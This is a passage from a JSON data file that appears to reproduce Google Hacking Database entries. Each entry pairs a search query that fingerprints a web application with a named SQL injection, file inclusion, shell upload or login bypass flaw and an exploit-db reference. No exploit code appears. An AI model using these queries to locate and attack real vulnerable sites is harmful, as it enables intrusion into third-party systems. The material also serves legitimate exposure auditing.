"shortDescription": "inurl:\"?pageNum_RSnews\"&view", "textualDescription": "NUs Newssystem v1.02 (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11674" }, { "signatureReferenceNumber": "1663", "link": "https://www.exploit-db.com/ghdb/1663/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_directory", "shortDescription": "inurl:index.php?option=com_directory", "textualDescription": "Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability - CVE: 2008-0690: http://www.exploit-db.com/exploits/5047" }, { "signatureReferenceNumber": "1664", "link": "https://www.exploit-db.com/ghdb/1664/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+DynamicPAD%22", "shortDescription": "\"Powered By DynamicPAD\"", "textualDescription": "DynamicPAD 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities - CVE: 2007-2527: http://www.exploit-db.com/exploits/3868" }, { "signatureReferenceNumber": "1666", "link": "https://www.exploit-db.com/ghdb/1666/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+:+elkagroup.com%22", "shortDescription": "\"Powered by : elkagroup.com\"", "textualDescription": "elkagroup (pid ) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10836" }, { "signatureReferenceNumber": "1667", "link": "https://www.exploit-db.com/ghdb/1667/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22com_joom12pic%22", "shortDescription": "\"com_joom12pic\"", "textualDescription": "Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4954: http://www.exploit-db.com/exploits/4416" }, { "signatureReferenceNumber": "1668", "link": "https://www.exploit-db.com/ghdb/1668/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Starting+bid%22+%22Powered+by+SoftbizScripts%22", "shortDescription": "\"Starting bid\" \"Powered by SoftbizScripts\"", "textualDescription": "Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln - CVE: 2007-5999: http://www.exploit-db.com/exploits/4617" }, { "signatureReferenceNumber": "1669", "link": "https://www.exploit-db.com/ghdb/1669/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Liberum+Help+Desk,+Copyright+(C)+2001+Doug+Luxem.+Please+view+the+license", "shortDescription": "\"Liberum Help Desk, Copyright (C) 2001 Doug Luxem. Please view the license", "textualDescription": "Liberum Help Desk 0.97.3 (details.asp) SQL Injection Vulnerability - CVE: 2006-6160: http://www.exploit-db.com/exploits/2846" }, { "signatureReferenceNumber": "1670", "link": "https://www.exploit-db.com/ghdb/1670/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:%22jokes.php%3Fcatagorie%3D%22", "shortDescription": "allinurl:\"jokes.php?catagorie=\"", "textualDescription": "Jokes Site Script (jokes.php?catagorie) SQL Injection Vulnerability - CVE: 2008-2065: http://www.exploit-db.com/exploits/5508" }, { "signatureReferenceNumber": "1671", "link": "https://www.exploit-db.com/ghdb/1671/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Created+by+weenCompany%22", "shortDescription": "\"Created by weenCompany\"", "textualDescription": "weenCompany SQL Injection Vulnerability - CVE: 2009-4423: http://www.exploit-db.com/exploits/10606" }, { "signatureReferenceNumber": "1672", "link": "https://www.exploit-db.com/ghdb/1672/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+by+eStore+v1.0.2%22", "shortDescription": "intext:\"Powered by eStore v1.0.2\"", "textualDescription": "eStore v1.0.2 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10784" }, { "signatureReferenceNumber": "1673", "link": "https://www.exploit-db.com/ghdb/1673/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by:+Elite+Gaming+Ladders+v3.2%22", "shortDescription": "\"Powered by: Elite Gaming Ladders v3.2\"", "textualDescription": "Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability - CVE: 2009-3314: http://www.exploit-db.com/exploits/9702" }, { "signatureReferenceNumber": "1674", "link": "https://www.exploit-db.com/ghdb/1674/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=php-addressbook+v3.1.5", "shortDescription": "php-addressbook v3.1.5", "textualDescription": "php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10877" }, { "signatureReferenceNumber": "1676", "link": "https://www.exploit-db.com/ghdb/1676/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+ParsBlogger%22", "shortDescription": "\"Powered by ParsBlogger\"", "textualDescription": "ParsBlogger (blog.asp wr) Remote SQL Injection Vulnerability - CVE: 2008-5637: http://www.exploit-db.com/exploits/7239" }, { "signatureReferenceNumber": "1677", "link": "https://www.exploit-db.com/ghdb/1677/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22vrnews+v1%22", "shortDescription": "intitle:\"vrnews v1\"", "textualDescription": "VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability - CVE: 2007-3611: http://www.exploit-db.com/exploits/4150" }, { "signatureReferenceNumber": "1678", "link": "https://www.exploit-db.com/ghdb/1678/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22customer_testimonials.php%22", "shortDescription": "inurl:\"customer_testimonials.php\"", "textualDescription": "osCommerce Addon Customer Testimonials 3.1 SQL Injection Vulnerability - CVE: 2008-0719: http://www.exploit-db.com/exploits/5075" }, { "signatureReferenceNumber": "1679", "link": "https://www.exploit-db.com/ghdb/1679/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Espinas+IT%22", "shortDescription": "\"Powered by Espinas IT\"", "textualDescription": "Espinas CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12100" }, { "signatureReferenceNumber": "1681", "link": "https://www.exploit-db.com/ghdb/1681/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+iNetScripts%22", "shortDescription": "\"Powered by iNetScripts\"", "textualDescription": "Powered by iNetScripts: Shell Upload Vulnerability: http://www.exploit-db.com/exploits/12384" }, { "signatureReferenceNumber": "1682", "link": "https://www.exploit-db.com/ghdb/1682/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Maintained+with+the+Ocean12+Poll+Manager+Pro+v1.00", "shortDescription": "Maintained with the Ocean12 Poll Manager Pro v1.00", "textualDescription": "Ocean12 Poll Manager Pro Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7246" }, { "signatureReferenceNumber": "1683", "link": "https://www.exploit-db.com/ghdb/1683/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22com_glossary%22", "shortDescription": "allinurl: \"com_glossary\"", "textualDescription": "Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability - CVE: 2008-0514: http://www.exploit-db.com/exploits/5010" }, { "signatureReferenceNumber": "1684", "link": "https://www.exploit-db.com/ghdb/1684/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22%C2%A9+2009+Azimut+Technologie%22", "shortDescription": "\"\u00a9 2009 Azimut Technologie\"", "textualDescription": "Azimut Technologie Admin Login Bypass vulnerability: http://www.exploit-db.com/exploits/12695" }, { "signatureReferenceNumber": "1685", "link": "https://www.exploit-db.com/ghdb/1685/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:buyer/about_us.php%3FBuyerID", "shortDescription": "inurl:buyer/about_us.php?BuyerID", "textualDescription": "Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12612" }, { "signatureReferenceNumber": "1686", "link": "https://www.exploit-db.com/ghdb/1686/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Maintained+with+the+Ocean12+Calendar+Manager+Gold+v2.04", "shortDescription": "Maintained with the Ocean12 Calendar Manager Gold v2.04", "textualDescription": "Ocean12 Calendar Manager Gold Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7247" }, { "signatureReferenceNumber": "1687", "link": "https://www.exploit-db.com/ghdb/1687/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=pagerank-0-topliste.html++OR+pagerank-0-tipp.html", "shortDescription": "pagerank-0-topliste.html OR pagerank-0-tipp.html", "textualDescription": "phpscripts Ranking Script Insecure Cookie Handling Vulnerability - CVE: 2008-6092: http://www.exploit-db.com/exploits/6649" }, { "signatureReferenceNumber": "1688", "link": "https://www.exploit-db.com/ghdb/1688/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Copyright+%C3%82%C2%A9+2007+BrowserCRM+Ltd", "shortDescription": "Copyright \u00c2\u00a9 2007 BrowserCRM Ltd", "textualDescription": "BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability - CVE: 2008-2689: http://www.exploit-db.com/exploits/5757" }, { "signatureReferenceNumber": "1689", "link": "https://www.exploit-db.com/ghdb/1689/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+UCenter+inurl:shop.php%3Fac%3Dview", "shortDescription": "Powered by UCenter inurl:shop.php?ac=view", "textualDescription": "UCenter Home 2.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14997" }, { "signatureReferenceNumber": "1690", "link": "https://www.exploit-db.com/ghdb/1690/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+By+:+Yamamah+Version+1.00%22", "shortDescription": "intext:\"Powered By : Yamamah Version 1.00\"", "textualDescription": "Yamamah 1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13849" }, { "signatureReferenceNumber": "1693", "link": "https://www.exploit-db.com/ghdb/1693/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Sinapis+by+scripter.ch%22", "shortDescription": "\"Sinapis by scripter.ch\"", "textualDescription": "Sinapis Forum 2.2 (sinapis.php fuss) Remote File Include Vulnerability - CVE: 2007-1131: http://www.exploit-db.com/exploits/3367" }, { "signatureReferenceNumber": "1694", "link": "https://www.exploit-db.com/ghdb/1694/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+BosClassifieds+Classified+Ads+System%22", "shortDescription": "\"Powered by BosClassifieds Classified Ads System\"", "textualDescription": "BosClassifieds 3.0 (index.php cat) SQL Injection Vulnerability - CVE: 2008-1838: http://www.exploit-db.com/exploits/5444" }, { "signatureReferenceNumber": "1696", "link": "https://www.exploit-db.com/ghdb/1696/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+RGameScript%22", "shortDescription": "\"Powered by RGameScript\"", "textualDescription": "RGameScript Pro (page.php id) Remote File Inclusion Vulnerability - CVE: 2007-3980: http://www.exploit-db.com/exploits/4210" }, { "signatureReferenceNumber": "1698", "link": "https://www.exploit-db.com/ghdb/1698/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22/files/redirect.asp%22", "shortDescription": "inurl:\"/files/redirect.asp\"", "textualDescription": "JBS v2.0 | JBSX - Administration panel bypass and Malicious File Upload Vulnerability: http://www.exploit-db.com/exploits/10161" }, { "signatureReferenceNumber": "1700", "link": "https://www.exploit-db.com/ghdb/1700/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Easy-Clanpage+v2.2%22", "shortDescription": "\"Easy-Clanpage v2.2\"", "textualDescription": "Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability - CVE: 2008-1425: http://www.exploit-db.com/exploits/5275" }, { "signatureReferenceNumber": "1702", "link": "https://www.exploit-db.com/ghdb/1702/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22/plugins/ImageManager/manager.php%22", "shortDescription": "inurl:\"/plugins/ImageManager/manager.php\"", "textualDescription": "Wordpress Image Manager Plugins Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10325" }, { "signatureReferenceNumber": "1703", "link": "https://www.exploit-db.com/ghdb/1703/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22com_joomlaflashfun%22", "shortDescription": "\"com_joomlaflashfun\"", "textualDescription": "Joomla Component Flash Fun! 1.0 Remote File Inclusion Vulnerability - CVE: 2007-4955: http://www.exploit-db.com/exploits/4415" }, { "signatureReferenceNumber": "1704", "link": "https://www.exploit-db.com/ghdb/1704/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+BKWorks+ProPHP+Version+0.50+Beta+1", "shortDescription": "Powered by BKWorks ProPHP Version 0.50 Beta 1", "textualDescription": "BKWorks ProPHP 0.50b1 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7726" }, { "signatureReferenceNumber": "1705", "link": "https://www.exploit-db.com/ghdb/1705/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22whoiscart/admin/hostinginterfaces/%22", "shortDescription": "inurl:\"whoiscart/admin/hostinginterfaces/\"", "textualDescription": "WHOISCART Scripting Vulnerability: http://www.exploit-db.com/exploits/10812" }, { "signatureReferenceNumber": "1706", "link": "https://www.exploit-db.com/ghdb/1706/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+Sisfo+Kampus+2006", "shortDescription": "Powered by Sisfo Kampus 2006", "textualDescription": "Sisfo Kampus 2006 (blanko.preview.php) Local File Disclosure Vuln - CVE: 2007-4820: http://www.exploit-db.com/exploits/4380" }, { "signatureReferenceNumber": "1708", "link": "https://www.exploit-db.com/ghdb/1708/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22sticker/sticker.php%3Fid%3D%22", "shortDescription": "inurl:\"sticker/sticker.php?id=\"", "textualDescription": "2Capsule (sticker.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7631" }, { "signatureReferenceNumber": "1709", "link": "https://www.exploit-db.com/ghdb/1709/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:quizinfo.php", "shortDescription": "inurl:quizinfo.php", "textualDescription": "PHP-MySQL-Quiz SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10876" }, { "signatureReferenceNumber": "1710", "link": "https://www.exploit-db.com/ghdb/1710/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Md-Pro%22", "shortDescription": "\"Powered by Md-Pro\"", "textualDescription": "Md-Pro 1.0.8x (Topics topicid) Remote SQL Injection Vulnerability - CVE: 2007-3938: http://www.exploit-db.com/exploits/4199" }, { "signatureReferenceNumber": "1711", "link": "https://www.exploit-db.com/ghdb/1711/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22index.php%3Foption%3Dcom_simpleboard%22", "shortDescription": "inurl:\"index.php?option=com_simpleboard\"", "textualDescription": "Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability - CVE: 2008-1077: http://www.exploit-db.com/exploits/5195" }, { "signatureReferenceNumber": "1712", "link": "https://www.exploit-db.com/ghdb/1712/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22tradeCategory.php%3Fid%3D+%22", "shortDescription": "inurl:\"tradeCategory.php?id= \"", "textualDescription": "Hampshire Trading Standards Script SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12768" }, { "signatureReferenceNumber": "1713", "link": "https://www.exploit-db.com/ghdb/1713/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_omphotogallery%22", "shortDescription": "inurl:\"com_omphotogallery\"", "textualDescription": "Joomla Omilen Photo Gallery 0.5b Local File Inclusion Vulnerability - CVE: 2009-4202: http://www.exploit-db.com/exploits/8870" }, { "signatureReferenceNumber": "1716", "link": "https://www.exploit-db.com/ghdb/1716/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22sinagb.php%22", "shortDescription": "inurl:\"sinagb.php\"", "textualDescription": "Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability - CVE: 2007-1130: http://www.exploit-db.com/exploits/3366" }, { "signatureReferenceNumber": "1717", "link": "https://www.exploit-db.com/ghdb/1717/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:csc_article_details.php", "shortDescription": "inurl:csc_article_details.php", "textualDescription": "CaupoShop Classic 1.3 (saArticle[ID]) Remote SQL Injection Vulnerability - CVE: 2008-2866: http://www.exploit-db.com/exploits/5865" }, { "signatureReferenceNumber": "1718", "link": "https://www.exploit-db.com/ghdb/1718/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Fpage%3Dimg+Powered+By+Mini+File+Host", "shortDescription": "inurl:index.php?page=img Powered By Mini File Host", "textualDescription": "Mini File Host 1.x Arbitrary PHP File Upload Vulnerability - CVE: 2008-6785: http://www.exploit-db.com/exploits/7509" }, { "signatureReferenceNumber": "1720", "link": "https://www.exploit-db.com/ghdb/1720/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:com_pccookbook", "shortDescription": "allinurl:com_pccookbook", "textualDescription": "pc_cookbook Mambo Component 0.3 Include Vulnerability - CVE: 2006-3530: http://www.exploit-db.com/exploits/2024" }, { "signatureReferenceNumber": "1721", "link": "https://www.exploit-db.com/ghdb/1721/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+LDU%22", "shortDescription": "\"Powered by LDU\"", "textualDescription": "LDU 8.x (polls.php) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/2871" }, { "signatureReferenceNumber": "1722", "link": "https://www.exploit-db.com/ghdb/1722/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22powered+by+tincan+ltd%22", "shortDescription": "intext:\"powered by tincan ltd\"", "textualDescription": "tincan ltd (section) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11113" }, { "signatureReferenceNumber": "1723", "link": "https://www.exploit-db.com/ghdb/1723/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+nzFotolog+v0.4.1+%C3%82%C2%A9+2005-2006+Ricardo+Amaral%22", "shortDescription": "\"Powered by nzFotolog v0.4.1 \u00c2\u00a9 2005-2006 Ricardo Amaral\"", "textualDescription": "nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability - CVE: 2008-3405: http://www.exploit-db.com/exploits/6164" }, { "signatureReferenceNumber": "1724", "link": "https://www.exploit-db.com/ghdb/1724/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22REALTOR+747+-+Version+4.11%22", "shortDescription": "\"REALTOR 747 - Version 4.11\"", "textualDescription": "Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability - CVE: 2009-0495: http://www.exploit-db.com/exploits/7743" }, { "signatureReferenceNumber": "1725", "link": "https://www.exploit-db.com/ghdb/1725/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22view_group.php%3Fgroup_id%3D%22", "shortDescription": "inurl:\"view_group.php?group_id=\"", "textualDescription": "Vastal I-Tech SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12845" }, { "signatureReferenceNumber": "1726", "link": "https://www.exploit-db.com/ghdb/1726/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22CzarNews+v1.12+%22+|+%22CzarNews+v1.13%22+|+%22CzarNews+v1.14+%22", "shortDescription": "\"CzarNews v1.12 \" | \"CzarNews v1.13\" | \"CzarNews v1.14 \"", "textualDescription": "CzarNews 1.14 (tpath) Remote File Inclusion Vulnerability - CVE: 2006-3685: http://www.exploit-db.com/exploits/2009" }, { "signatureReferenceNumber": "1728", "link": "https://www.exploit-db.com/ghdb/1728/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22filebase.php%22+%22Powered+by+phpBB%22", "shortDescription": "inurl:\"filebase.php\" \"Powered by phpBB\"", "textualDescription": "phpBB Mod FileBase (id) Remote SQL Injection Vulnerability - CVE: 2008-1305: http://www.exploit-db.com/exploits/5236" }, { "signatureReferenceNumber": "1729", "link": "https://www.exploit-db.com/ghdb/1729/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22name+Sections+op+viewarticle+artid%22", "shortDescription": "allinurl: \"name Sections op viewarticle artid\"", "textualDescription": "PHP-Nuke Module Sections (artid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5154" }, { "signatureReferenceNumber": "1730", "link": "https://www.exploit-db.com/ghdb/1730/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+samart-cms%22", "shortDescription": "\"Powered by samart-cms\"", "textualDescription": "samart-cms 2.0 (contentsid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5862" }, { "signatureReferenceNumber": "1731", "link": "https://www.exploit-db.com/ghdb/1731/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Ultimate-Fun-Book+1.02", "shortDescription": "Ultimate-Fun-Book 1.02", "textualDescription": "Ultimate Fun Book 1.02 (function.php) Remote File Include Vulnerability - CVE: 2007-1059: http://www.exploit-db.com/exploits/3336" }, { "signatureReferenceNumber": "1732", "link": "https://www.exploit-db.com/ghdb/1732/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22modules/dictionary/detail.php%3Fid%22", "shortDescription": "allinurl: \"modules/dictionary/detail.php?id\"", "textualDescription": "XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability - CVE: 2009-4582: http://www.exploit-db.com/exploits/10807" }, { "signatureReferenceNumber": "1733", "link": "https://www.exploit-db.com/ghdb/1733/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Copyright+(C)+2000++Phorum+Development+Team%22", "shortDescription": "\"Copyright (C) 2000 Phorum Development Team\"", "textualDescription": "Phorum 3.2.11 (common.php) Remote File Include Vulnerability - CVE: 2006-6550: http://www.exploit-db.com/exploits/2894" }, { "signatureReferenceNumber": "1734", "link": "https://www.exploit-db.com/ghdb/1734/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:flashblog.html++OR++inurl:/flashblog/", "shortDescription": "inurl:flashblog.html OR inurl:/flashblog/", "textualDescription": "FlashBlog 0.31b Remote Arbitrary File Upload Vulnerability - CVE: 2008-2574: http://www.exploit-db.com/exploits/5728" }, { "signatureReferenceNumber": "1736", "link": "https://www.exploit-db.com/ghdb/1736/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+CMS-BRD%22", "shortDescription": "\"Powered By CMS-BRD\"", "textualDescription": "CMS-BRD (menuclick) Remote SQL Injection Vulnerability - CVE: 2008-2837: http://www.exploit-db.com/exploits/5863" }, { "signatureReferenceNumber": "1737", "link": "https://www.exploit-db.com/ghdb/1737/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22inurl:/admin/%22+%22ImageVue%22", "shortDescription": "\"inurl:/admin/\" \"ImageVue\"", "textualDescription": "ImageVue 2.0 Remote Admin Login: http://www.exploit-db.com/exploits/10630" }, { "signatureReferenceNumber": "1738", "link": "https://www.exploit-db.com/ghdb/1738/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22TROforum+0.1%22", "shortDescription": "\"TROforum 0.1\"", "textualDescription": "TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability - CVE: 2007-2937: http://www.exploit-db.com/exploits/3995" }, { "signatureReferenceNumber": "1739", "link": "https://www.exploit-db.com/ghdb/1739/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Uploader+by+CeleronDude.%22", "shortDescription": "\"Uploader by CeleronDude.\"", "textualDescription": "Uploader by CeleronDude 5.3.0 Shell Upload: http://www.exploit-db.com/exploits/10523" }, { "signatureReferenceNumber": "1740", "link": "https://www.exploit-db.com/ghdb/1740/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Review+Script%22+%22Phil+Taylor%22", "shortDescription": "\"Review Script\" \"Phil Taylor\"", "textualDescription": "Mambo Component Comments 0.5.8.5g SQL Injection Vulnerability - CVE: 2008-0773: http://www.exploit-db.com/exploits/5094" }, { "signatureReferenceNumber": "1741", "link": "https://www.exploit-db.com/ghdb/1741/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:Mp3+ToolBox+1.0", "shortDescription": "intitle:Mp3 ToolBox 1.0", "textualDescription": "Mp3 ToolBox 1.0 beta 5 (skin_file) Remote File Inclusion Vulnerability - CVE: 2007-6139: http://www.exploit-db.com/exploits/4650" }, { "signatureReferenceNumber": "1742", "link": "https://www.exploit-db.com/ghdb/1742/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by:+Maian+Greetings+v2.1", "shortDescription": "Powered by: Maian Greetings v2.1", "textualDescription": "Maian Greetings 2.1 Insecure Cookie Handling Vulnerability - CVE: 2008-7086: http://www.exploit-db.com/exploits/6050" }, { "signatureReferenceNumber": "1743", "link": "https://www.exploit-db.com/ghdb/1743/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:+%22com_alberghi%22+detail", "shortDescription": "allinurl: \"com_alberghi\" detail", "textualDescription": "Joomla Component Alberghi 2.1.3 (id) SQL Injection Vulnerability - CVE: 2008-1459: http://www.exploit-db.com/exploits/5278" }, { "signatureReferenceNumber": "1744", "link": "https://www.exploit-db.com/ghdb/1744/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+phpBB+Garage+1.2.0%22", "shortDescription": "\"Powered By phpBB Garage 1.2.0\"", "textualDescription": "phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability - CVE: 2007-6223: http://www.exploit-db.com/exploits/4686" }, { "signatureReferenceNumber": "1746", "link": "https://www.exploit-db.com/ghdb/1746/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:index.php%3Foption%3Dcom_ynews", "shortDescription": "inurl:index.php?option=com_ynews", "textualDescription": "Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-0653: http://www.exploit-db.com/exploits/5072" }, { "signatureReferenceNumber": "1747", "link": "https://www.exploit-db.com/ghdb/1747/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powie's+PSCRIPT+MatchMaker+4.05%22", "shortDescription": "\"Powie's PSCRIPT MatchMaker 4.05\"", "textualDescription": "Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability - CVE: 2006-6039: http://www.exploit-db.com/exploits/2798" }, { "signatureReferenceNumber": "1748", "link": "https://www.exploit-db.com/ghdb/1748/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:etkinlikbak.asp", "shortDescription": "inurl:etkinlikbak.asp", "textualDescription": "Okul Web Otomasyon Sistemi 4.0.1 Remote SQL Injection Vulnerability - CVE: 2007-0305: http://www.exploit-db.com/exploits/3135" }, { "signatureReferenceNumber": "1749", "link": "https://www.exploit-db.com/ghdb/1749/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Copyright+2008+ImenAfzar+ver+:2.0.0.0%22", "shortDescription": "\"Copyright 2008 ImenAfzar ver :2.0.0.0\"", "textualDescription": "Namad (IMenAfzar) 2.0.0.0 Remote File Disclosure Vulnerability: http://www.exploit-db.com/exploits/8734" }, { "signatureReferenceNumber": "1750", "link": "https://www.exploit-db.com/ghdb/1750/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=allinurl:com_comprofiler", "shortDescription": "allinurl:com_comprofiler", "textualDescription": "Joomla Community Builder 1.0.1 Blind SQL Injection Vulnerability - CVE: 2008-2093: http://www.exploit-db.com/exploits/5491" }, { "signatureReferenceNumber": "1751", "link": "https://www.exploit-db.com/ghdb/1751/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_joomlaradiov5%22", "shortDescription": "inurl:\"com_joomlaradiov5\"", "textualDescription": "Joomla Component joomlaradio v5 Remote File Inclusion Vulnerability - CVE: 2007-4923: http://www.exploit-db.com/exploits/4401" }, { "signatureReferenceNumber": "1752", "link": "https://www.exploit-db.com/ghdb/1752/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+phpAdBoard%22", "shortDescription": "\"powered by phpAdBoard\"", "textualDescription": "phpAdBoard (php uploads) Arbitrary File Upload Vulnerability - CVE: 2008-6921: http://www.exploit-db.com/exploits/7562" }, { "signatureReferenceNumber": "1753", "link": "https://www.exploit-db.com/ghdb/1753/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Quick.Cms%22", "shortDescription": "\"Powered by Quick.Cms\"", "textualDescription": "Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability - CVE: 2009-1410: http://www.exploit-db.com/exploits/8505" }, { "signatureReferenceNumber": "1754", "link": "https://www.exploit-db.com/ghdb/1754/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+wpQuiz%22+inurl:index.php", "shortDescription": "\"Powered by wpQuiz\" inurl:index.php", "textualDescription": "wpQuiz v2.7 Authentication Bypass Vulnerability - CVE: 2010-3608: 